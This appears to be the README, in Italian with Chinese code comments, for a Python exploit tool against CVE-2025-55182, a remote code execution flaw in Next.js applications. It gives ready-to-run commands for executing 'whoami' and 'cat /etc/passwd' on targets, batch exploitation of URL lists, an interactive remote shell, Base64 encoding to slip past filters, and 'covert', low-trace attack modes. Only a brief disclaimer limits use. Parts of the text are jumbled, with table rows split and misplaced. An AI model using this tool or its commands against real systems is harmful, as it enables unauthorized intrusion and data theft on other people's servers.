
Exploit basato su Python per CVE-2025-55182 (RCE in Next.js) con scansione di target singoli/batch, esecuzione di comandi, shell interattiva e 4 modalità di attacco con supporto alla codifica Base64.
Questo strumento serve a rilevare e sfruttare la vulnerabilità CVE-2025-55182 (presumibilmente una vulnerabilità di esecuzione di codice nei framework correlati a Next.js). Supporta rilevamento batch su singolo target o più target, esecuzione di comandi, shell interattiva e altre funzioni. Offre 4 modalità di attacco adattabili a diversi scenari e supporta configurazioni flessibili come codifica Base64 dei comandi, inoltro tramite proxy e output di log.
La vulnerabilità CVE-2025-55182 può essere presente nelle applicazioni correlate a Next.js. Manipolando una richiesta dannosa si altera la logica di esecuzione in _response, iniettando chiamate al modulo child_process, realizzando l'esecuzione remota di comandi (RCE). Lo strumento invia dati di form appositamente predisposti per attivare la vulnerabilità e restituisce l'esito dell'esecuzione del comando.
requestspip install requests
# 执行 whoami 命令(攻击模式1:有响应)
python CVE-2025-55182-exploit.py -u https://target.com -c "whoami"
# 执行系统命令(Base64编码,避免特殊字符拦截)
python CVE-2025-55182-exploit.py -u https://target.com -c "cat /etc/passwd" -b
# 完整回复模式(Base64解码返回结果)
python CVE-2025-55182-exploit.py -u https://target.com -c "ipconfig" -p 4
# 从文件读取目标URL,批量执行 id 命令(20线程)
python CVE-2025-55182-exploit.py -l targets.txt -c "id" -t 20 -o result.log
# 连接目标,进入交互式命令行(支持Base64编码切换)
python CVE-2025-55182-exploit.py -u https://target.com -s
# 通过Burp Suite代理抓包分析
python CVE-2025-55182-exploit.py -u https://target.com -c "whoami" --proxy http://127.0.0.1:8080
| Parametro | Abbreviazione | Obbligatorio | Descrizione | Esempio |
|---|---|---|---|---|
--url | -u | No | URL di un singolo target (in alternativa a -l; -u ha la precedenza) | -u https://target.com |
--url-list | -l | No | File con elenco di URL target (un URL per riga; supporta URL senza protocollo, aggiunge automaticamente http/https) | -l urls.txt |
--payload | -p | No | Modalità di attacco (predefinita: 1) 1=con risposta (execSync) | 2=senza risposta (execSync) 3=senza risposta (exec) |
--cmd | -c | No | Comando di sistema da eseguire (obbligatorio in modalità batch/singolo target; mutuamente esclusivo con -s) | -c "whoami" oppure -c "dir" |
--threads | -t | No | Numero di thread per il rilevamento batch (predefinito: 10, consigliato non superiore a 50) | -t 20 |
--outlog | -o | No | File di log di output (predefinito: cve-2025-55182.log) | -o exploit.log |
--base64 | -b | No | Codifica in Base64 il comando specificato con -c (evita che i caratteri speciali vengano bloccati) | -c "cat /etc/passwd" -b |
--cmd-shell | -s | No | Modalità shell interattiva (supporta solo singolo target -u; mutuamente esclusivo con -c) | -u https://target.com -s |
--proxy | - | No | Configurazione proxy (supporta proxy HTTP/HTTPS, per cattura pacchetti o inoltro del traffico) |
| N. modalità | Descrizione | Caratteristiche | Scenari di utilizzo |
|---|---|---|---|
| 1 | Con risposta (execSync) | Esegue il comando in modo sincrono, restituisce un redirect 303, il risultato è incluso nell'intestazione della risposta | Verifica rapida della presenza della vulnerabilità |
| 2 | Senza risposta (execSync) | Esegue il comando in modo sincrono, nessun risultato restituito (l'effetto va confermato con altri mezzi) | Operazioni di esecuzione occultate |
| 3 | Senza risposta (exec) | Esegue il comando in modo asincrono, nessun risultato restituito (bassa traccia, adatto a operazioni che non richiedono conferma) | Attacchi batch occultati |
| 4 | Risposta completa | Esegue il comando in modo sincrono, il risultato viene restituito codificato in Base64 nel corpo della risposta (lo strumento lo decodifica automaticamente) | Scenari in cui è necessario visualizzare l'output completo del comando |
| Comando | Descrizione |
|---|---|
b64 | Passa alla modalità comandi con codifica Base64 |
nob64 | Esce dalla modalità di codifica Base64 |
exit | Esce dalla shell interattiva |
? | Mostra le informazioni di aiuto |
--outlog, per analisi successive;-u e -l sono alternativi; se specificati insieme viene usato -u;-c e -s sono mutuamente esclusivi; in modalità -s non è necessario specificare -c;-l non ha il protocollo (ad es. target.com), lo strumento tenterà automaticamente http:// e https://;https://target.com) per evitare inutili errori di connessione;-b o b64, lo strumento gestisce automaticamente la codifica/decodifica Base64, senza intervento manuale;--time-out per evitare falsi negativi.--skip-check per saltare il controllo;-p 4 modalità risposta completa);-b) per evitare che il comando venga bloccato dal sistema target;--time-out;http://target.com).Questo strumento è destinato esclusivamente alla ricerca sulla sicurezza informatica e alla verifica delle vulnerabilità. Ogni conseguenza derivante dalla violazione della legge sulla sicurezza informatica e di altre normative applicabili è di esclusiva responsabilità dell'utente, non degli sviluppatori dello strumento.
--proxy http://127.0.0.1:8080 |
--skip-check | - | No | Salta il controllo di connettività del proxy (per impostazione predefinita verifica la disponibilità del proxy) | --proxy http://127.0.0.1:8080 --skip-check |
--time-out | - | No | Timeout delle richieste (in secondi, predefinito: 10) | --time-out 15 |